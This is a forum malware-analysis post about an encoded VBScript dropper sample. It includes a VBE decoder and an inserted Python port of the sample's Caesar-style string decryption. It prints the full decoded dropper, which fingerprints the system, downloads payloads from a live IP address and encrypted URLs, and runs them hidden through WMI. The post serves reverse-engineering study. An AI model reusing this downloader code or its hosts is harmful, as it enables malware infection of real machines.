- May 14, 2016
- 1,597
z.vbe
4/55
To understand some of the following parts, some knowledge of a programming language will help a lot.
Why this sample ?
- Because it is the first time I show here the first method used :
This file is a .vbe file, a "Visual Basic Script encoded script file" (what a beautiful long name)
But we can simply call it "VBScript Encoded Script File".
- Once decoded, it uses other obfuscation methods.
- To infect the PC, WScript.exe needs to be run with at least 3 command line arguments (excluding the file name), which are read by this .vbe script. Online analysis tools run it with none.
=> this is why VirusTotal does not report much suspicious behavior
I think it will be interesting to analyze this sample, as a lot of stuff is used.
One important argument is missing (in fact they are all important) : the password used by the script to decrypt some important parts :
=> I will show in part 4) (second post) how to find it by reasoning + reversing
1) Quick look at the vbe code :
One line of 7200 chars:
Begins with : #@~^
Ends with : ^#~@
2) Let's decode the vbe part to obtain a vbs-like script :
To decode it, it's easy.
I used a modified (very small modification) part of a code from 2001
Author : Jean-Luc Antoine
hxxp://www.interclasse.com/scripts/decovbe.php
It decodes all files encoded with screnc.exe (original version).
Why "modified version" ? Because the function used to browse folders and choose a file doesn't work anymore on the latest versions of Windows (7, 8 & 10).
ScrEnc: Classic ASP Encoder, VBScript Source Code Encoder, JavaScript Obfuscator, HTML/VBS/JScript/C++ Source Code Encoder, Screnc/Windows Script Encoder Replacement
=> see the videos as example => very instructive : Online Screencasts - Scripts Encryptor - Encoder
The parts I used:
Dim fso,fic,contenu
Set fso = CreateObject("Scripting.FileSystemObject")
Set fic = fso.OpenTextFile(NomFichier, 1) ' NomFichier = path of the z.vbe file
Contenu=fic.readAll
fic.close
Const TagInit="#@~^" '#@~^awQAAA==
Const TagFin="==^#~@" '& chr(0)
Dim DebutCode, FinCode
Do
    FinCode=0
    DebutCode=Instr(Contenu,TagInit)
    If DebutCode>0 Then
        If (Instr(DebutCode,Contenu,"==")-DebutCode)=10 Then 'If "==" follows the tag
            FinCode=Instr(DebutCode,Contenu,TagFin)
            If FinCode>0 Then
                ' replace the encoded block (tag + 8-char header + "==" ... "==^#~@") by its decoded text
                Contenu=Left(Contenu,DebutCode-1) & _
                    Decode(Mid(Contenu,DebutCode+12,FinCode-DebutCode-12-6)) & _
                    Mid(Contenu,FinCode+6)
            End If
        End If
    End If
Loop Until FinCode=0
The Decode function is applied again by the loop above if several encoded blocks are present.
Function Decode(Chaine)
    Dim se,i,c,j,index,ChaineTemp
    Dim tDecode(127)
    Const Combinaison="1231232332321323132311233213233211323231311231321323112331123132"
    ' Build the decoding table by encoding each printable character with the
    ' official Scripting.Encoder and reading back the 3 possible substitutes
    Set se=WSCript.CreateObject("Scripting.Encoder")
    For i=9 to 127
        tDecode(i)="JLA"
    Next
    For i=9 to 127
        ChaineTemp=Mid(se.EncodeScriptFile(".vbs",string(3,i),0,""),13,3)
        For j=1 to 3
            c=Asc(Mid(ChaineTemp,j,1))
            tDecode(c)=Left(tDecode(c),j-1) & chr(i) & Mid(tDecode(c),j+1)
        Next
    Next
    'Next line we correct a bug, otherwise a ")" could be decoded to a ">"
    tDecode(42)=Left(tDecode(42),1) & ")" & Right(tDecode(42),1)
    Set se=Nothing
    ' Undo the escape sequences used by the encoder
    Chaine=Replace(Replace(Chaine,"@&",chr(10)),"@#",chr(13))
    Chaine=Replace(Replace(Chaine,"@*",">"),"@!","<")
    Chaine=Replace(Chaine,"@$","@")
    ' Each character is replaced by one of its 3 substitutes, chosen by Combinaison
    index=-1
    For i=1 to Len(Chaine)
        c=asc(Mid(Chaine,i,1))
        If c<128 Then index=index+1
        If (c=9) or ((c>31) and (c<128)) Then
            If (c<>60) and (c<>62) and (c<>64) Then
                Chaine=Left(Chaine,i-1) & Mid(tDecode(c),Mid(Combinaison,(index mod 64)+1,1),1) & Mid(Chaine,i+1)
            End If
        End If
    Next
    Decode=Chaine
End Function
Dim fic,contenu
Set fic = fso.OpenTextFile(NomFichier, 1) ' z.vbe file
Contenu=fic.readAll
fic.close
Here, after the loop, Contenu contains the decoded string from the vbe.
I used copy-paste to copy the string from Contenu to Notepad++
and made "find-replace" by regular expressions:
all \r\n => replaced by new lines
all \t => replaced by tabulation
all \" => replaced by "
(I could have saved it directly with Microsoft Visual Studio to a file, to remove the escape characters used for formatting, but less fun)
On Error Resume Next
Dim OSlag,OSver,numcpus,objOutParams,objWMIREGService,currentpath
Set objWMIREGService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\DEFAULT:StdRegProv")
objOutParams = objWMIREGService.GetStringValue(&H80000002, "SYSTEM\\CurrentControlSet\\Control\\Nls\\Language", "Default",OSlag)
objOutParams = objWMIREGService.GetStringValue(&H80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "CurrentVersion",OSver)
objOutParams = objWMIREGService.GetStringValue(&H80000002, "SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment", "NUMBER_OF_PROCESSORS",numcpus)
notincn = outcn()
If WScript.Arguments.Count >= 3 Then
    bji=WScript.Arguments(0)
    strpwd=WScript.Arguments(1) ' string as password
    appurl=WScript.Arguments(2) ' appurl encrypted
    'appurl=MDnStr(appurl,strpwd)
Else
    WScript.Quit
End If
currentpath = createobject("Scripting.FileSystemObject").GetFile(Wscript.ScriptFullName).ParentFolder.Path
Dim x864
x864 = X86orX64()
If OSlag = "0804" Or OSlag = "0c04" Then
    If OSver = "5.2" Then
        If yxsj() < 9 And numcpus < 8 Then
            WScript.Quit
        Else
            wlog(bji + "-CN-" + OSlag + " " + x864)
            dl MDnStr("macu://w3-hy-yqcxmjhby-1.erfgxsgya.htt/revmwy01234/nsr/jwruhj.enw",strpwd),MDnStr("H:\\Boplsbx\\Bdyvmq32\\fgko\\QTK\\15.nwk",strpwd)
        End If
    Else
        wlog(bji + "-CN-" + OSlag + " " + x864)
        dl MDnStr("macu://w3-hy-yqcxmjhby-1.erfgxsgya.htt/revmwy01234/nsr/bbruhj2.epy",strpwd),MDnStr("h:\\boplsbx\\cjsr\\mnxzcy.fix",strpwd)
        Set fso = CreateObject("Scripting.FileSystemObject")
        fso.CopyFile MDnStr("h:\\boplsbx\\cjsr\\mnxzcy.fix",strpwd),MDnStr("H:\\Boplsbx\\Bdyvmq32\\fgko\\QTK\\15.nwk",strpwd),1
        Set fso=Nothing
        runprg MDnStr("rvohuox.jcl h:\\emsivfx\\vmqu\\prxyvb.ifa",strpwd)
    End If
    If yxsj() < 9 And numcpus < 8 Then
        dl MDnStr("macu://wytyjlk.tmaj.lts/qxjrz/KLEJ80F06I421H31!248?lpaj.inv",strpwd),MDnStr("h:\\boplsbx\\cjsr\\miy.inv",strpwd)
        runprg MDnStr("htm.kzm /h lxitqty.lgj /j /j:EGYezmuy.Nsiqli h:\\boplsbx\\cjsr\\miy.inv&K:\\Bpwiuya\\YJTY\\oub.gfa",strpwd)
    Else
        dl "http://67.227.173.54:88/tyaz.zip",currentpath + "\\isst.zip"
        runprg MDnStr("htm.kzm /h lxitqty.lgj /j /j:EGYezmuy.Nsiqli ",strpwd) + currentpath + "\\isst.zip " + strpwd + " " + appurl
    End If
    WScript.Quit
Else
    wlog(bji + "-USA-" + OSlag + " " + x864)
    'dl MDnStr("macu://w3-hy-yqcxmjhby-1.erfgxsgya.htt/revmwy01234/nsr/bbruhj2.epy",strpwd),MDnStr("H:\\Boplsbx\\Bdyvmq32\\fgko\\QTK\\15.nwk",strpwd)
    dl MDnStr("macu://w3-hy-yqcxmjhby-1.erfgxsgya.htt/revmwy01234/nsr/bbruhj2.epy",strpwd),MDnStr("h:\\boplsbx\\cjsr\\mnxzcy.fix",strpwd)
    Set fso = CreateObject("Scripting.FileSystemObject")
    fso.CopyFile MDnStr("h:\\boplsbx\\cjsr\\mnxzcy.fix",strpwd),MDnStr("H:\\Boplsbx\\Bdyvmq32\\fgko\\QTK\\15.nwk",strpwd),1
    Set fso=Nothing
    runprg MDnStr("rvohuox.jcl h:\\emsivfx\\vmqu\\prxyvb.ifa",strpwd)
    dl "http://67.227.173.54:88/tyaz.zip",currentpath + "\\isst.zip"
    runprg MDnStr("htm.kzm /h lxitqty.lgj /j /j:EGYezmuy.Nsiqli ",strpwd) + currentpath + "\\isst.zip " + strpwd + " " + appurl
End If

Function dl(u,f)
    dim xHttp:Set xHttp = createobject(MDnStr("BpwMzvx.BnuQyzrZivzlby.5.1",strpwd))
    dim bStrm:Set bStrm = createobject(MDnStr("Fkxih.Axwjhv",strpwd))
    xHttp.Open "GET",u, 0
    'xHttp.setRequestHeader "Authorization","Basic dXNhMDA3OmVhOVo4eWRoUkRFdnhLUWlwNVV2UGMy"
    xHttp.Send
    with bStrm
        .type = 1
        .open
        .write xHttp.responseBody
        .savetofile f,2
        .close
    end with
end Function

Function wlog(slog)
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    windir = objFSO.GetSpecialFolder(0)
    Set f = objFSO.CreateTextFile(windir + "\\wb2010kb.log",1)
    f.WriteLine(slog)
    f.Close
    Set objFSO = Nothing
End Function

Function runprg(ppath)
    Set objPS = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\CIMV2")
    Set objStartup = objPS.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_()
    objConfig.ShowWindow = 0
    Set objShare = objPS.Get("Win32_Process")
    Set objInParam = objShare.Methods_("Create").inParameters.SpawnInstance_()
    objInParam.Properties_.Item("CommandLine") = ppath
    objInParam.Properties_.Item("ProcessStartupInformation") = objConfig
    Set objOutParams = objPS.ExecMethod("Win32_Process", "Create", objInParam)
End Function

Function outcn()
    Err.Clear
    On Error Resume Next
    dim xHttp:Set xHttp = createobject(MDnStr("BpwMzvx.BnuQyzrZivzlby.5.1",strpwd))
    xHttp.Open "GET",MDnStr("macu://xgppwhu.ituxwxy.ewq/",strpwd), 0
    xHttp.Send
    If Err.Number <> 0 Then
        outcn = 0
        Set xHttp = Nothing
        Exit Function
    End If
    If xHttp.responseText = "hello" Then
        outcn = 1
        Set xHttp = Nothing
        Exit Function
    End If
    Set xHttp = Nothing
    outcn = 0
End Function

Function UTCtoNow(nD)
    If Not IsNull(nD) Then
        Set SWDT = CreateObject("WbemScripting.SWbemDateTime")
        SWDT.Value = nD
        UTCtoNow = SWDT.GetVarDate(True)
    End If
End Function

Function StoHMS(Sec)
    H = Int(Sec/3600) :H1 = Sec Mod 3600:M = Int(H1/60) :S = H1 Mod 60
    StoHMS = H
End Function

Function yxsj()
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\\\" & strComputer & "\\root\\CIMV2")
    Set colItems = objWMIService.ExecQuery( _
        "SELECT * FROM Win32_OperatingSystem",,48)
    For Each objItem in colItems
        yxsj = StoHMS(DateDiff("s", UTCtoNow(objItem.LastBootUpTime), Now()))
        Exit Function
    Next
End Function

Function X86orX64()
    On Error Resume Next
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\\\" & strComputer & "\\root\\cimv2")
    Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem",,48)
    For Each objItem in colItems
        If InStr(objItem.SystemType, "86") <> 0 Then
            X86orX64 = "x86"
        ElseIf InStr(objItem.SystemType, "64") <> 0 Then
            X86orX64 = "x64"
        Else
            X86orX64 = objItem.SystemType
        End If
    Next
End Function

Function DCaesar(str,offset)
    Dim length,char,i
    DCaesar = ""
    length = Len(str)
    For i = 1 To length
        char = Mid(str,i,1)
        If char >= "A" And char <= "Z" Then
            char = Asc("Z") - (Asc("Z") - Asc(char) + offset) Mod 26
            DCaesar = DCaesar & Chr(char)
        ElseIf char >= "a" And char <= "z" Then
            char = Asc("z") - (Asc("z") - Asc(char) + offset) Mod 26
            DCaesar = DCaesar & Chr(char)
        Else
            DCaesar = DCaesar & char
        End If
    Next
End Function

Function MDnStr(OldStr,Pwd)
    Dim newstr:newstr = ""
    length = Len(Pwd)
    lengthstr = Len(OldStr)
    For i = 1 To lengthstr
        char = Mid(OldStr,i,1)
        p = i Mod length
        If p = 0 Then p = 1
        p = Mid(Pwd,p,1)
        newstr = newstr & DCaesar(char,p)
    Next
    MDnStr = newstr
End Function
If you remember my other analyses, you will recognize some code / methods used,
for example, from this post :
https://malwaretips.com/threads/scripted-samples-from-malware-vault-5-8-16-8.62121/#post-531277
3) Before some explanation of the obfuscated parts (after the vbe decoding) :
I will end this first part by trying to remind you of one encryption method you may have learned at school :
look at this function, and its name :
Function DCaesar(str,offset)
    Dim length,char,i
    DCaesar = ""
    length = Len(str)
    For i = 1 To length
        char = Mid(str,i,1)
        If char >= "A" And char <= "Z" Then
            char = Asc("Z") - (Asc("Z") - Asc(char) + offset) Mod 26
            DCaesar = DCaesar & Chr(char)
        ElseIf char >= "a" And char <= "z" Then
            char = Asc("z") - (Asc("z") - Asc(char) + offset) Mod 26
            DCaesar = DCaesar & Chr(char)
        Else
            DCaesar = DCaesar & char
        End If
    Next
End Function
An "obfuscation" method which comes from the famous Caesar.
Some reading for you:
Caesar cipher - Wikipedia, the free encyclopedia
"The transformation can be represented by aligning two alphabets; the cipher alphabet is the plain alphabet rotated left or right by some number of positions. For instance, here is a Caesar cipher using a left rotation of three places, equivalent to a right shift of 23 (the shift parameter is used as the key):
Plain: ABCDEFGHIJKLMNOPQRSTUVWXYZ
Cipher: XYZABCDEFGHIJKLMNOPQRSTUVW
When encrypting, a person looks up each letter of the message in the "plain" line and writes down the corresponding letter in the "cipher" line.
Plaintext: THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG
Ciphertext: QEB NRFZH YOLTK CLU GRJMP LSBO QEB IXWV ALD
Deciphering is done in reverse, with a right shift of 3.
The replacement remains the same throughout the message, so the cipher is classed as a type of monoalphabetic substitution, as opposed to polyalphabetic substitution."
The script uses the DCaesar function as a sub-function of the main decrypter function
(if not, it would have been too "lol")
Command line arguments used by the script:
bji=WScript.Arguments(0)
strpwd=WScript.Arguments(1) ' string as password
appurl=WScript.Arguments(2) ' appurl encrypted
And this is where the second argument from the command line is important : Pwd
Function MDnStr(OldStr,Pwd)
    Dim newstr:newstr = ""
    length = Len(Pwd)
    lengthstr = Len(OldStr)
    For i = 1 To lengthstr
        char = Mid(OldStr,i,1)
        p = i Mod length
        If p = 0 Then p = 1
        p = Mid(Pwd,p,1)
        newstr = newstr & DCaesar(char,p)
    Next
    MDnStr = newstr
End Function
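A Python port of the DCaesar / MDnStr pair above, as an added example (my code, not the post's or the sample's): it reproduces the per-character shift keyed by the password, and also shows the reverse step the post announces for part 4), i.e. that a guessed plaintext for one decrypted string yields one password digit per letter position. The password "2016", the plaintexts and the ciphertexts used here are constructed test values, not the sample's.

```python
"""Port of the sample's DCaesar / MDnStr routines (added example, not from the post).
The password "2016" and all strings below are constructed test values."""

import string
from typing import List, Optional


def dcaesar(ch: str, offset: int) -> str:
    """One character of DCaesar: Asc("Z") - (Asc("Z") - Asc(char) + offset) Mod 26."""
    if "A" <= ch <= "Z":
        return chr(ord("Z") - (ord("Z") - ord(ch) + offset) % 26)
    if "a" <= ch <= "z":
        return chr(ord("z") - (ord("z") - ord(ch) + offset) % 26)
    return ch  # digits, punctuation and path separators pass through unchanged


def mdnstr(old: str, pwd: str) -> str:
    """MDnStr: decrypt `old` with the command-line password `pwd`.

    In the VBScript the shift is one character of Pwd added to a number, so the
    script only works when every password character is a digit; hence int().
    """
    out = []
    n = len(pwd)
    for i, ch in enumerate(old, start=1):  # VBScript Mid() is 1-based
        p = i % n or 1  # "If p = 0 Then p = 1": the last password digit is never used
        out.append(dcaesar(ch, int(pwd[p - 1])))
    return "".join(out)


def mdnstr_encrypt(plain: str, pwd: str) -> str:
    """Inverse of mdnstr (not part of the sample); used to build test vectors."""
    out = []
    n = len(pwd)
    for i, ch in enumerate(plain, start=1):
        k = int(pwd[(i % n or 1) - 1])
        if "A" <= ch <= "Z":
            ch = chr(ord("Z") - (ord("Z") - ord(ch) - k) % 26)
        elif "a" <= ch <= "z":
            ch = chr(ord("z") - (ord("z") - ord(ch) - k) % 26)
        out.append(ch)
    return "".join(out)


def shifts_from_known_plaintext(cipher: str, plain: str) -> List[Optional[int]]:
    """Shift implied at each position by a (ciphertext, guessed plaintext) pair.

    For ASCII letters of the same case, dcaesar(c, k) == p exactly when
    k == (c - p) mod 26. Non-letters carry no information (None). A shift
    above 9 means the guess is wrong, since every shift is one password digit.
    """
    shifts: List[Optional[int]] = []
    for c, p in zip(cipher, plain):
        same_case = c in string.ascii_letters and p in string.ascii_letters \
            and c.islower() == p.islower()
        shifts.append((ord(c) - ord(p)) % 26 if same_case else None)
    return shifts


def password_from_shifts(shifts: List[Optional[int]], length: int) -> Optional[str]:
    """Fold per-position shifts into password digits for an assumed length.

    Returns None when the length is impossible (two positions that reuse the
    same password digit disagree, or a shift is not a single digit). Digits
    never constrained by the known text are reported as "?".
    """
    digits: List[Optional[int]] = [None] * length
    for i, k in enumerate(shifts, start=1):
        if k is None:
            continue
        if k > 9:
            return None
        p = (i % length or 1) - 1  # same index rule as MDnStr
        if digits[p] not in (None, k):
            return None
        digits[p] = k
    return "".join("?" if d is None else str(d) for d in digits)
```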
---------------------------------------------------------------------------------------------------------------------------
Warning :
"http://67.227.173.54:88/tyaz.zip" => "\\isst.zip"
In part 4) I will comment on some important parts of the script / functions
and show you how we can obtain the password parameter by some reasoning / reversing (remember that we only have the malware script, not the arguments used in the command line).